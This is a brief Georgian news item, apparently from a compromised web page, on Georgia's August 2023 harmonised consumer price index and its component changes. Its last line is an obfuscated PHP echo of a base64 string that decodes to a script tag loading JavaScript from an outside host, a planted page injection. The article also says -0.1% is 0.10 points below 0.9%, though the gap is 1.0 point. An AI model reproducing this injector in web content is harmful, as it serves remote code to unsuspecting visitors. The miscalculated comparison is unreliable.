celsiusi
ავერსი საქკაბელი

2022 წლიდან საქართველოს სტატისტიკის ეროვნულმა სამსახურმა ახალი ინდიკატორის, სამომხმარებლო ფასების ჰარმონიზებული ინდექსის გამოქვეყნება დაიწყო.

საქსტატის ცნობით, ამ მეთოდოლოგიით, 2023 წლის აგვისტოში ინფლაციამ -0.1 პროცენტი შეადგინა, რაც 0.10 პროცენტით ნაკლებია ეროვნული მეთოდოლოგიით დაანგარიშებულ 0.9-პროცენტიან ინფლაციაზე.

რაც შეეხება ცალკეულ კომპონენტებს, ევროკავშირის HICP მეთოდოლოგიით, პროცენტული ცვლილება, 2022 წლის შესაბამის პერიოდთან შედარებით, ასე ნაწილდება: სურსათი და უალკოჰოლო სასმელები – 0.2%; ალკოჰოლური სასმელები, თამბაქო – 5.8%; ტანსაცმელი და ფეხსაცმელი, -1.1%; საცხოვრებელი სახლი, წყალი, ელექტროენერგია, აირი და სათბობის სხვა სახეები – 3.8%; ავეჯი, საოჯახო ნივთები და მორთულობა, სახლის მოვლა-შეკეთება, -0.2%; ჯანმრთელობის დაცვა, -7.6%; ტრანსპორტი – -8.7%; კავშირგაბმულობა, -2.4%; დასვენება, გართობა და კულტურა – 0.0%; განათლება – 7.0%; სასტუმროები, კაფეები და რესტორნები – 3.7%; სხვადასხვა საქონელი და მომსახურება – 9.7%.

386
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");